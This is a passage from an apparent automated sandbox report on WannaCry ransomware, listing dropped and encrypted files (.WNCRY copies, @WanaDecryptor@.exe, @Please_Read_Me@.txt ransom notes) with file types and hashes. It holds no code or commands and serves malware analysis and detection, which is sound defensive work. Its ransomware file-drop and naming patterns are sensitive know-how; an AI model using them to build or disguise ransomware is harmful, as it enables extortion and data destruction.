  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{67D69890-D853-4011-A87E-AA64FA83CE5A}.2.ver0x0000000000000002.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000b.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{86012F79-362C-43D2-98EF-AB58A0A31343}.2.ver0x0000000000000001.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Default\Desktop\@WanaDecryptor@.bmp
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
  • MD5: E9436E3155846B6C6464AE67EB862669
  • SHA: 8CD8CC5D61681C325EF6149F705329149FDA6CFF
  • SHA-256: 7B197DB14A940BBDFAE26EF3C6AAF4FC9FF4949B7F02EA56B766EB758DB690A6
  • SHA-512: 1F97D004F11475EF21A331683FCE5C6A82AAFFC9877FB20E682735D20161C6A7D2D17B29B470E9DA192B7CE9E4423DD4E633E018246ABAF6F2A18EA7925CA3A5
false
C:\Users\Default\Desktop\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 21EC02E9D9EDEEEB49701203C20480B1
  • SHA: C70790D8F1249178151EF748D3D19AEDAA595353
  • SHA-256: ED792106D746C8C2F6B7214FE43D9396DF70844924F6EECC914A661FC8FF905D
  • SHA-512: BA0BC197489DF945EA084C1023B7ECF5EAF0A0427000EBECEEB5895F0C02F6F041D139795616C61AE2B9540DD9E788D308D1DBD36FA3AA3283A2ACB404D64B75
true
C:\Users\Public\Desktop\@WanaDecryptor@.bmp
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
  • MD5: E9436E3155846B6C6464AE67EB862669
  • SHA: 8CD8CC5D61681C325EF6149F705329149FDA6CFF
  • SHA-256: 7B197DB14A940BBDFAE26EF3C6AAF4FC9FF4949B7F02EA56B766EB758DB690A6
  • SHA-512: 1F97D004F11475EF21A331683FCE5C6A82AAFFC9877FB20E682735D20161C6A7D2D17B29B470E9DA192B7CE9E4423DD4E633E018246ABAF6F2A18EA7925CA3A5
false
C:\Users\Public\Desktop\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 21EC02E9D9EDEEEB49701203C20480B1
  • SHA: C70790D8F1249178151EF748D3D19AEDAA595353
  • SHA-256: ED792106D746C8C2F6B7214FE43D9396DF70844924F6EECC914A661FC8FF905D
  • SHA-512: BA0BC197489DF945EA084C1023B7ECF5EAF0A0427000EBECEEB5895F0C02F6F041D139795616C61AE2B9540DD9E788D308D1DBD36FA3AA3283A2ACB404D64B75
true
C:\Users\Public\Music\Sample Music\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7A2726BB6E6A79FB1D092B7F2B688AF0
  • SHA: B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
  • SHA-256: 840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
  • SHA-512: 4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
false
C:\Users\Public\Music\Sample Music\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 16:54:39 2017, mtime=Fri May 12 16:54:39 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: 380FE084AD836A4DCDD236D4695FB370
  • SHA: 1C78147AB1FB2257E8D5D9B7A722EBBD4C40F0A3
  • SHA-256: 660BA89414429CA08516C9C95C3C7A02EDA12BC73434CD8AA8AD844039C9B568
  • SHA-512: 318DD4F9F442D0A45A1D19CCA2E986BB6A67B38437D65AE9599C3C79C82DEDD899F369F8B6A9614C96AB23D8D204F57E7891D506895E50D60F80C2A1B0EDB697
true
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRY (copy)
  • Type:
  • MD5: 723A866CBA7675F161ECAD3068CF396C
  • SHA: ABC16661683ABB3BE43D6963ECB2E83B00AB4404
  • SHA-256: 333B21F21602F3CE509164BA717D7D3CE61C29BC4DDF8DECD4D96B9A5BB60618
  • SHA-512: C1498E3E0778B6FA517E0C0443191374B6F9B9473741664895EB81D38F81BE94B20B5580C34CE10BBC4A4FDD32224D14B58C5D04FF51AA893F8F2F22D4CF7260
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRY (copy)
  • Type:
  • MD5: 3A36EBBD5DE8E18630CC724E5211E616
  • SHA: 2320CFB15EAD801ACDE0FFB1295B11CC272AC8E2
  • SHA-256: 5F65EECB6E8D263E9F04F597BBACAC565076DAF6EC739710E805D24F7726161C
  • SHA-512: E08F149F11E2B4A115B655070D6F3EF58A42D99BF7E45257ED8B43F0FF652E2B2F8339F17D860AF0FE70D8EDB8FA7CC05AAB9ABF34228E429EBBBD81F5DF203C
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRY (copy)
  • Type:
  • MD5: 8E6B3B16529B1279C1329456C59A7214
  • SHA: D5C46D0883E2C38B1F5134AFA525F6BE7062659E
  • SHA-256: 5F57F057629A62EC6B2872F00B01396760467D46C5B7B2BD72984E576B147BA2
  • SHA-512: E85388875D217254FF0A4337827CF95A21755FEB87605CDBDF5B020EF807819490BAA86838D5CC192266932539562029FD6ABB43DEB217ECE19DF545228EB9D3
false
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRY (copy)
  • Type:
  • MD5: 5F90B89E160457EA5AE6FF6D8B6DF2B1
  • SHA: 1FF67A18F7A2E4F4CA71789087E513EE7E618825
  • SHA-256: 20025AD459C45D39556E56CE0F5DE7E21E9F48A6987EEA63A26F14A8DEED5585
  • SHA-512: A1913A879E8679241672072202DB69DFEA7579B4E6CB5DE4508BA054FDCBC0B9FDBEB309B9B5C56DFB86BFD620E7FD595690DAF74B41B8A01F90C099A3127163
false
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRY (copy)
  • Type:
  • MD5: 15860AA73AB9F6C7C7BBFB741D3E4B1A
  • SHA: FF20BA5B6EAE9669E6E671BAC13E83CED9B06E83
  • SHA-256: 1ABA72A51E54F08BA6731AD1957834D61E229D322A65A8411229D1870B3ECF27
  • SHA-512: 383307B5DED1764BB07FFF2A152018B0BDE050EA221FEAAA3DF4B8797F31B155AF233042D09F61F2972489D060F0BB05C2D67DC93543F59F17F4B2890BC09883
false
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7A2726BB6E6A79FB1D092B7F2B688AF0
  • SHA: B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
  • SHA-256: 840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
  • SHA-512: 4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
false
C:\Users\Public\Pictures\Sample Pictures\@WanaDecryptor@.exe.lnk
